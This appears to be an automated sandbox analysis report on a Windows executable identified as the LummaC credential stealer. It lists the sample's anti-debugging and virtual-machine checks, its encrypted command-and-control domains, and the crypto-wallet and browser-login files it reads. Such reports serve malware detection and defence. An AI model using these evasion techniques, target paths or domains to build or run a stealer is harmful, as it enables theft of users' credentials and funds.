Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EC9 second address: 6689EDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FC22CC1B8AEh 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5FB3 second address: 66C5FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5FB9 second address: 66C5FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5FBF second address: 66C5FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5FC3 second address: 66C6013 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B4h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC22CC1B8B5h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FC22CC1B8B7h 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C6928 second address: 66C6940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C6940 second address: 66C6960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22CC1B8B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C6960 second address: 66C696B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66CA7DC second address: 66CA7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66CA7E1 second address: 66CA7E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C97EC second address: 66C9808 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC22CC1B8A8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC22CC1B8ADh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66CA992 second address: 66CA9A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jnp 00007FC22D01ECDBh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D508E second address: 66D5094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D5094 second address: 66D50F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC22D01ECD6h 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007FC22D01ECCCh 0x00000012 jnl 00007FC22D01ECD2h 0x00000018 jmp 00007FC22D01ECD2h 0x0000001d push ebx 0x0000001e jmp 00007FC22D01ECD2h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 668D4D2 second address: 668D4EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B5h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D45BD second address: 66D45C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D45C1 second address: 66D45E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8ABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC22CC1B8AFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D45E1 second address: 66D45E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D45E6 second address: 66D462B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B4h 0x00000009 jmp 00007FC22CC1B8B9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 jnl 00007FC22CC1B8A8h 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007FC22CC1B8A6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D4D2D second address: 66D4D46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D4D46 second address: 66D4D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D4D54 second address: 66D4D82 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22D01ECC6h 0x00000008 js 00007FC22D01ECC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FC22D01ECCEh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC22D01ECCEh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D4EDC second address: 66D4F06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC22CC1B8B3h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D877C second address: 66D879E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC22D01ECCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007FC22D01ECCCh 0x00000016 jo 00007FC22D01ECC6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D879E second address: 66D8801 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22CC1B8ACh 0x00000008 jp 00007FC22CC1B8A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 mov dword ptr [ebp+122D3BB6h], ebx 0x00000017 call 00007FC22CC1B8A9h 0x0000001c pushad 0x0000001d jmp 00007FC22CC1B8B2h 0x00000022 ja 00007FC22CC1B8A8h 0x00000028 popad 0x00000029 push eax 0x0000002a push ecx 0x0000002b je 00007FC22CC1B8A8h 0x00000031 pushad 0x00000032 popad 0x00000033 pop ecx 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 jmp 00007FC22CC1B8ACh 0x0000003d mov eax, dword ptr [eax] 0x0000003f jnp 00007FC22CC1B8B4h 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 9A8E92 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: B60C8E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: BE87B2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 66C8E1D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 651B152 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 651DF42 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 66D5BAC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 6765397 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Special instruction interceptor: First address: 652297C instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality to detect virtual machines (SLDT)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Code function: 0_3_014F1775 sldt word ptr [eax+0000007Ah]

0_3_014F1775

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 2352	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 2052	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 2828	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe TID: 3700	Thread sleep time: -38019s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000002.1876753898.00000000063DC000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1877430428.00000000066AA000.00000040.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B85000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001447000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWZ
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 0zBsv1tnt4.exe, 00000000.00000002.1876753898.00000000063DC000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1877430428.00000000066AA000.00000040.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 0zBsv1tnt4.exe, 00000000.00000003.1536018059.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: NTICE
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: SICE
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Code function: 0_2_0098E110 LdrInitializeThunk,

0_2_0098E110

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: 0zBsv1tnt4.exe	String found in binary or memory: hummskitnj.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: appliacnesot.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: cashfuzysao.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: inherineau.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: screwamusresz.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: rebuildeso.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: scentniej.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: mindhandru.buzz
Source: 0zBsv1tnt4.exe	String found in binary or memory: prisonyfork.buzz

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior

Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OProgram Manager
Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000002.1877430428.00000000066AA000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: {Program Manager

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 0zBsv1tnt4.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 0zBsv1tnt4.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"
Source: 0zBsv1tnt4.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0T
Source: 0zBsv1tnt4.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 0zBsv1tnt4.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keysto
Source: 0zBsv1tnt4.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 0zBsv1tnt4.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
